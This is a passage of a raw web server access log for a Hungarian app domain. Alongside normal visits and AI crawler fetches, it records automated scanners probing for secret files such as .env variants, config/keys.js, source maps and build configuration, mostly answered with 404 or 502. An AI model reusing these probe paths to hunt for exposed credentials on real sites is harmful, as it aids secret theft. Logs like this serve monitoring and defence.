NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/__env.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/@vite/client" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/polyfills.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/root.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/.svelte-kit/output/client/_app/env.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/src/env.d.ts" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:48:41 +0000] - 404 404 - GET http app.profibot.hu "/favicon.ico" [Client 91.196.152.154] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[20/Jan/2026:19:54:07 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 44.251.198.148] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:19:54:07 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 44.251.198.148] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582" "-" +[20/Jan/2026:20:13:29 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 104.252.191.182] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[20/Jan/2026:20:13:33 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 104.164.173.164] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[20/Jan/2026:20:13:40 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 104.252.191.182] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[20/Jan/2026:20:19:23 +0000] - 404 404 - HEAD https app.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:20:19:23 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:20:19:23 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:20:19:23 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:20:20:11 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 128.192.12.109] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (compatible; UGAResearchAgent/1.0; Please visit: NISLabUGA.github.io)" "-" +[20/Jan/2026:20:25:11 +0000] - 404 404 - GET https app.profibot.hu "/robots.txt" [Client 74.7.230.45] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[20/Jan/2026:20:25:12 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 74.7.227.51] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[20/Jan/2026:20:31:44 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 54.186.67.103] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36 Edge/18.19582" "-" +[20/Jan/2026:20:31:45 +0000] - 200 200 - GET https app.profibot.hu "/api/vehicles" [Client 54.186.67.103] [Length 1555] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36 Edge/18.19582" "https://app.profibot.hu/" +[20/Jan/2026:20:31:45 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 54.186.67.103] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36 Edge/18.19582" "https://app.profibot.hu/" +[20/Jan/2026:20:31:48 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 54.186.67.103] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:20:31:49 +0000] - 200 200 - GET https app.profibot.hu "/api/vehicles" [Client 54.186.67.103] [Length 1555] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://app.profibot.hu/" +[20/Jan/2026:20:31:49 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 54.186.67.103] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://app.profibot.hu/" +[20/Jan/2026:20:31:55 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 136.119.98.99] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "-" +[20/Jan/2026:20:47:58 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 95.181.233.141] [Length 3835] [Gzip 3.03] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[20/Jan/2026:20:47:58 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 95.181.233.141] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[20/Jan/2026:20:56:49 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 34.222.43.39] [Length 30] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36" "-" +[20/Jan/2026:20:56:49 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 34.222.43.39] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:20:56:54 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 34.222.43.39] [Length 30] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Mobile Safari/537.36" "-" +[20/Jan/2026:20:56:54 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 34.222.43.39] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.59 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:21:02:07 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.254.106.197] [Length 3682] [Gzip 2.96] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:21:02:07 +0000] - 404 404 - GET https app.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:21:02:07 +0000] - 404 404 - GET https app.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:21:02:08 +0000] - 404 404 - GET https app.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:21:38:01 +0000] - 404 404 - GET https app.profibot.hu "/robots.txt" [Client 216.73.216.109] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[20/Jan/2026:21:38:01 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 216.73.216.109] [Length 3864] [Gzip 3.05] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/src/env.d.ts" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/vite.config.ts" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/app/root.tsx" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/vendor.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_astro/page.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/config/env.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/static/js/3.chunk.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/js/app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/src/env.d.ts" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/app.js.map" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_app/env.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/@vite/env" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/vite.config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/.svelte-kit/output/client/_app/env.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/__config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/commons.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/assets/main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/api/settings" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/static/js/app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_nuxt/vendors.app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/settings.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/build/qwik-loader.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/pages/index.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/.env.vite" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/static/js/4.chunk.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_astro/hoisted.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/page-data/app-data.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/config/keys.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/build/index.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/bundle.js.map" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/runtime-config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/main.js.map" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/src/env.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/vendor.js.map" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/dist/main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/subscribe" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/__env.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/config/index.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/lib/config.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/public/js/app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/api/config" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/js/main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/settings.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/donate" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/checkout" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/static/js/main.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/app/entry.client.tsx" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/env.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/build/q-manifest.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/polyfills.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/stripe.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/serviceworker.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/webpack-runtime.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/public/js/bundle.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/_buildManifest.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/dist/client.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/.vite/manifest.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/api/config.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/.vite/deps/_metadata.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/build/root.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_app/immutable/entry/app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/build/asset-manifest.json" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_next/static/chunks/pages/_app.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/service-worker.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/build/static/js/bundle.js" [Client 34.27.62.169] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:22:02:39 +0000] - 502 502 - GET https app.profibot.hu "/_app/immutable/chunks/singletons.js" [Client 34.27.62.169] [Length 154] [Gzip 